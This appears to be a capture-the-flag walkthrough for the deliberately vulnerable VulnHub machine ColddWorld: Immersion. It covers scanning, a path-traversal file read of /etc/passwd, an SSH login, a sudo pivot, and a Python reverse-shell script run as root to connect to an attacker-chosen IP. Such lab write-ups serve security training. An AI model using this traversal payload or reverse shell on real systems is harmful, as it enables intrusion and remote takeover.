ColddWorld: Immersion (VulnHub) - Write-up

 ColddWorld: Immersion is a vulnerable box from VulnHub that I would rate it as easy difficulty.

Nmap result:

$ sudo nmap -sC -sV 192.168.0.18   
                                                                                            
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 10:23 EEST
Nmap scan report for 192.168.0.18
Host is up (0.00029s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Immersion
MAC Address: 08:00:27:22:E5:01 (Oracle VirtualBox virtual NIC)

Checking port 80 website:

Gobuster scan:

$ gobuster dir -u http://192.168.0.18 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,txt

/js (Status: 301)
/css (Status: 301)
/login (Status: 301)
/secure (Status: 301)
/wp (Status: 301)
/server-status (Status: 403)

Visiting /login page:

Page source for /login:

There is a file named carls.txt inside /var directory.

The /wp page goes nowhere.

We can login to /login with random credentials. Checking the URL we can see that is using some parameters for user and password.

Let's see if we can find others parameter.

wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt --hw 0 -u '192.168.0.18/login/account.php?FUZZ=../../../../../../../../etc/passwd'

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                               
=====================================================================

000000064:   200        31 L     43 W       1608 Ch     "page"

Looks like there is another parameter that we can use: page

And if we visit "http://192.168.0.18/login/account.php?page=../../../../../../../etc/passwd", we have LFI:

Retrieving carls credentials by accessing:

http://192.168.0.18/login/account.php?page=../../../../../../../var/carls.txt

Credentials:

There is nowhere to login with the credentials, so I'll do another nmap scan for all the ports:

$ nmap -p- 192.168.0.18   
 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 10:36 EEST
Nmap scan report for 192.168.0.18
Host is up (0.00029s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
80/tcp   open  http
3042/tcp open  journee

New port discovered:

$ nmap -p3042 -sC -sV 192.168.0.18

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 10:37 EEST
Nmap scan report for 192.168.0.18
Host is up (0.00044s latency).

PORT     STATE SERVICE VERSION
3042/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c7:43:9b:1e:c2:a8:27:6b:c2:bc:58:a9:4d:6d:4e:14 (RSA)
|   256 60:99:c2:87:ea:6a:14:75:e1:b4:6f:93:4f:9b:fd:89 (ECDSA)
|_  256 7f:b2:4a:f2:ec:db:a5:87:45:92:2f:13:2e:5e:74:bd (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Looks like port 3042 is the ssh port. But before we login, we need to decode the password because is base64 encoded:

base64: Y2FybG9z
decoded: carlos

Shell as user carls:

Checking user carls privileges:

By executing the following command we can get a shell as user c0ldd:

sudo -u c0ldd /bin/bash

Shell as user c0ldd:

Checking user c0ldd privileges:

We can run DoNotRun.py as root.

Note: Do not run that file because is an infinite loop:

In order to get a reverse shell, rename the DoNotRun.py file to something else and create your own DoNotRun.py file with the following content:

#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("Your IP",Port)) # Add your IP and Port here
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Now execute the file as root with the following command: 

sudo -u root /usr/bin/python3 /home/c0ldd/DoNotRun.py

Shell as root:

Now you can get the user flag from user c0ldd's directory and the root flag from the root directory!